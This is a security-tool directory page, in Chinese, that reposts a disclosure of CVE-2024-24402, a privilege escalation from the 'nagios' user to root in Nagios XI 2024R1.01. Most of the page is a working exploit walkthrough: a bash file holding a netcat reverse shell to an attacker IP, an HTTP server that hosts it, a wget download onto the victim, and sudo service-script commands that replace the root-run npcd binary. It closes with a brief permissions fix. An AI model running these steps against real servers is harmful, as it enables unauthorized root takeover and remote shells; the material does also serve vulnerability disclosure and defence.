Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-24402 — Priv esc in Nagios 2024R1.01 | Kitploit
工具/GitHubGitHub/mawk0235/cve-2024-24402
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubmawk0235/cve-2024-24402

CVE-2024-24402

Priv esc in Nagios 2024R1.01

查看仓库
42年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞报告

CVE 发现者: Jarod Jaslow (MAWK)

漏洞详情:

  • 端点: Nagios XI Version 2024R1.01
  • 漏洞类型: 来自用户 "NAGIOS" 的权限提升
  • 利用结果: 在目标系统上获得完整的 root 访问权限

复现步骤:

1. 创建 Nagios XI Version 2024R1.01 的新实例:

  • 从以下地址下载 Nagios XI OVA 文件: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
  • 部署 OVA 以创建新实例。
  • 利用我之前报告的漏洞在服务器上获得 RCE

2. 滥用权限提升:

  • 作为用户 "NAGIOS", 在攻击者机器上创建包含以下内容的文件:

    root@kitploit:~
    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445
    

Pasted image 20240118113554

  • 通过 Python HTTP 服务器在攻击者机器上托管该文件:

    root@kitploit:~
    python3 -m http.server 8000
    

Pasted image 20240118173813

  • 在攻击者机器上启动 Netcat (NC) 监听服务器:

    root@kitploit:~
    nc -nlvp 4445
    

Pasted image 20240118173831

3. 在受害者计算机上执行利用:

  • 从攻击者机器获取文件:

    root@kitploit:~
    wget http://<Attacker IP>:8000/npcd
    

Pasted image 20240118173846

  • 执行以下命令以提升权限并接收 root 连接:

    root@kitploit:~
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    

Pasted image 20240118173857

Pasted image 20240118173915

建议:

建议限制用户 "NAGIOS" 写入以 root 身份运行的 Nagios 服务可执行文件的能力。这可以通过对与 Nagios 服务相关的目录和文件实施更严格的文件权限和访问控制来实现。

这应该在新版本中修复

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

下载工具